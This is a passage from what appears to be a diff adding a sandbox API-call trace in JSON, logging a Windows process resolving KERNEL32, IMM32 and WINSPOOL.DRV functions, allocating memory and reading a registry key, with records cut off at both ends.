"value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsSetValue" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756c3040" + } + ], + "repeated": 0, + "id": 5 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNELBASE.dll" + }, + { + "name": "ModuleHandle", + "value": "0x755a0000" + }, + { + "name": "FunctionName", + "value": "FlsFree" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x756de180" + } + ], + "repeated": 0, + "id": 6 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04c31000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 7 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x770307f7", + "parentcaller": "0x770304ff", + "category": "process", + "api": "NtAllocateVirtualMemory", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ProcessHandle", + "value": "0xffffffff" + }, + { + "name": "BaseAddress", + "value": "0x04c32000" + }, + { + "name": "RegionSize", + "value": "0x00001000" + }, + { + "name": "Protection", + "value": "0x00000004", + "pretty_value": "PAGE_READWRITE" + }, + { + "name": "StackPivoted", + "value": "no" + } + ], + "repeated": 0, + "id": 8 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756b71bf", + "parentcaller": "0x73e7e285", + "category": "system", + "api": "LdrGetDllHandle", + "status": false, + "return": "0xffffffffc0000135", + "pretty_return": "DLL_NOT_FOUND", + "arguments": [ + { + "name": "FileName", + "value": "LPK.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x73e60000" + } + ], + "repeated": 0, + "id": 9 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756b71bf", + "parentcaller": "0x73e7e294", + "category": "system", + "api": "LdrGetDllHandle", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "FileName", + "value": "KERNEL32" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + } + ], + "repeated": 0, + "id": 10 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "KERNEL32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x760f0000" + }, + { + "name": "FunctionName", + "value": "ProcessIdToSessionId" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x76111230" + } + ], + "repeated": 0, + "id": 11 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x73e66cbc", + "parentcaller": "0x73e7e2dc", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000068" + }, + { + "name": "uiParam", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 12 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x77043939", + "parentcaller": "0x7701d794", + "category": "process", + "api": "NtQueryInformationToken", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "TokenInformationClass", + "value": "1" + }, + { + "name": "TokenInformation", + "value": "\\x8c\\xf3\\x19\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00\\xaa\tT\\x1e\\xa0\\x13}z\\xa7\\x1b\\x0f\\xf2\\xe9\\x03\\x00\\x00\\xd0\\xf3\\x19\\x00\\x1eolu\\xc4\\xf3\\x19\\x00\\x00\\x00\\x00\\x00@s\\xecs&\\x00'\\x00\\xc4?\\xb6v\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00n\\xd9\\x01\\x01\\x10\\xf4\\x19\\x00" + } + ], + "repeated": 0, + "id": 13 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x7701d7c7", + "parentcaller": "0x756dc167", + "category": "registry", + "api": "NtOpenKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "KeyHandle", + "value": "0x0000022c" + }, + { + "name": "DesiredAccess", + "value": "0x00020019", + "pretty_value": "KEY_READ" + }, + { + "name": "ObjectAttributesHandle", + "value": "0x00000000" + }, + { + "name": "ObjectAttributesName", + "value": "\\REGISTRY\\USER\\S-1-5-21-508823978-2055017376-4061076391-1001" + }, + { + "name": "ObjectAttributes", + "value": "HKEY_CURRENT_USER" + } + ], + "repeated": 0, + "id": 14 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x73e66dfb", + "parentcaller": "0x73e7e2dc", + "category": "misc", + "api": "GetSystemMetrics", + "status": true, + "return": "0x00000400", + "arguments": [ + { + "name": "SystemMetricIndex", + "value": "0" + } + ], + "repeated": 0, + "id": 15 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x73e66e08", + "parentcaller": "0x73e7e2dc", + "category": "misc", + "api": "GetSystemMetrics", + "status": true, + "return": "0x00000300", + "arguments": [ + { + "name": "SystemMetricIndex", + "value": "1" + } + ], + "repeated": 0, + "id": 16 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x73e66e3e", + "parentcaller": "0x73e7e2dc", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000029" + }, + { + "name": "uiParam", + "value": "0x000001f4" + } + ], + "repeated": 0, + "id": 17 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x73e66eaf", + "parentcaller": "0x73e7e2dc", + "category": "misc", + "api": "SystemParametersInfoW", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "Action", + "value": "0x00000066" + }, + { + "name": "uiParam", + "value": "0x00000000" + } + ], + "repeated": 0, + "id": 18 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x73e66ec6", + "parentcaller": "0x73e7e2dc", + "category": "registry", + "api": "RegCloseKey", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Handle", + "value": "0x0000022c" + } + ], + "repeated": 0, + "id": 19 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756b8236", + "parentcaller": "0x756dd921", + "category": "system", + "api": "LdrLoadDll", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "Flags", + "value": "0x00000000" + }, + { + "name": "FileName", + "value": "imm32.dll" + }, + { + "name": "BaseAddress", + "value": "0x74eb0000" + } + ], + "repeated": 0, + "id": 20 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmCreateContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb7770" + } + ], + "repeated": 0, + "id": 21 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmDestroyContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb77e0" + } + ], + "repeated": 0, + "id": 22 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmNotifyIME" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74ebbc30" + } + ], + "repeated": 0, + "id": 23 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmAssociateContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb5150" + } + ], + "repeated": 0, + "id": 24 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmReleaseContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb4e80" + } + ], + "repeated": 0, + "id": 25 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmGetContext" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb3b30" + } + ], + "repeated": 0, + "id": 26 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmGetCompositionStringA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb84b0" + } + ], + "repeated": 0, + "id": 27 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmSetCompositionStringA" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb9050" + } + ], + "repeated": 0, + "id": 28 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmGetCompositionStringW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb8550" + } + ], + "repeated": 0, + "id": 29 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmSetCompositionStringW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb9080" + } + ], + "repeated": 0, + "id": 30 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "IMM32.DLL" + }, + { + "name": "ModuleHandle", + "value": "0x74eb0000" + }, + { + "name": "FunctionName", + "value": "ImmSetCandidateWindow" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x74eb8d60" + } + ], + "repeated": 0, + "id": 31 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfc5d", + "parentcaller": "0x7610fb94", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.19041.1110_none_c0da534e38c01f4d\\comctl32" + }, + { + "name": "BaseAddress", + "value": "0x73e60000" + }, + { + "name": "InitRoutine", + "value": "0x73ec7340" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 32 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x77017c50", + "parentcaller": "0x756a2f24", + "category": "system", + "api": "LdrpCallInitRoutine", + "status": true, + "return": "0x00000001", + "arguments": [ + { + "name": "MappedPath", + "value": "\\Device\\HarddiskVolume2\\Windows\\SysWOW64\\comdlg32" + }, + { + "name": "BaseAddress", + "value": "0x75260000" + }, + { + "name": "InitRoutine", + "value": "0x752a2290" + }, + { + "name": "Reason", + "value": "1" + } + ], + "repeated": 0, + "id": 33 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0758f", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "218" + }, + { + "name": "FunctionAddress", + "value": "0x73efcb80" + } + ], + "repeated": 0, + "id": 34 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f075a0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "217" + }, + { + "name": "FunctionAddress", + "value": "0x73f29d30" + } + ], + "repeated": 0, + "id": 35 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f075b1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetDefaultPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f27130" + } + ], + "repeated": 0, + "id": 36 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f075c2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetDefaultPrinterW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73efec70" + } + ], + "repeated": 0, + "id": 37 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f075d3", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDriverPackagePathW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2f8a0" + } + ], + "repeated": 0, + "id": 38 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f075e4", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "CorePrinterDriverInstalledW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2ef80" + } + ], + "repeated": 0, + "id": 39 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f075f5", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetCorePrinterDriversW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2f520" + } + ], + "repeated": 0, + "id": 40 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07606", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "UploadPrinterDriverPackageW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2fe80" + } + ], + "repeated": 0, + "id": 41 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07617", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "InstallPrinterDriverFromPackageW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2fb40" + } + ], + "repeated": 0, + "id": 42 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07628", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "" + }, + { + "name": "Ordinal", + "value": "251" + }, + { + "name": "FunctionAddress", + "value": "0x73f048c0" + } + ], + "repeated": 0, + "id": 43 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07639", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "AddPrinterConnection2W" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f2e4a0" + } + ], + "repeated": 0, + "id": 44 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0764a", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "OpenPrinter2W" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f067b0" + } + ], + "repeated": 0, + "id": 45 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0765b", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterKeyW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20230" + } + ], + "repeated": 0, + "id": 46 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0766c", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1fe30" + } + ], + "repeated": 0, + "id": 47 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0767d", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterKeyW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f21030" + } + ], + "repeated": 0, + "id": 48 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0768e", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20ba0" + } + ], + "repeated": 0, + "id": 49 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f0769f", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "GetPrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73eff930" + } + ], + "repeated": 0, + "id": 50 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f076b0", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetPrinterDataExW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23460" + } + ], + "repeated": 0, + "id": 51 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f076c1", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DeletePrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f1ff40" + } + ], + "repeated": 0, + "id": 52 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f076d2", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "EnumPrinterDataW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f20d30" + } + ], + "repeated": 0, + "id": 53 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f076e3", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SpoolerPrinterEvent" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23be0" + } + ], + "repeated": 0, + "id": 54 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f076f4", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "SetPortW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f23350" + } + ], + "repeated": 0, + "id": 55 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07705", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DocumentPropertySheets" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f00320" + } + ], + "repeated": 0, + "id": 56 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07716", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "DevicePropertySheets" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f24130" + } + ], + "repeated": 0, + "id": 57 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07727", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + "value": "WINSPOOL.DRV" + }, + { + "name": "ModuleHandle", + "value": "0x73ef0000" + }, + { + "name": "FunctionName", + "value": "IsValidDevmodeW" + }, + { + "name": "Ordinal", + "value": "0" + }, + { + "name": "FunctionAddress", + "value": "0x73f05910" + } + ], + "repeated": 0, + "id": 58 + }, + { + "timestamp": "2025-03-07 22:33:07,969", + "thread_id": "9440", + "caller": "0x756bfbba", + "parentcaller": "0x73f07738", + "category": "system", + "api": "LdrGetProcedureAddressForCaller", + "status": true, + "return": "0x00000000", + "arguments": [ + { + "name": "ModuleName", + 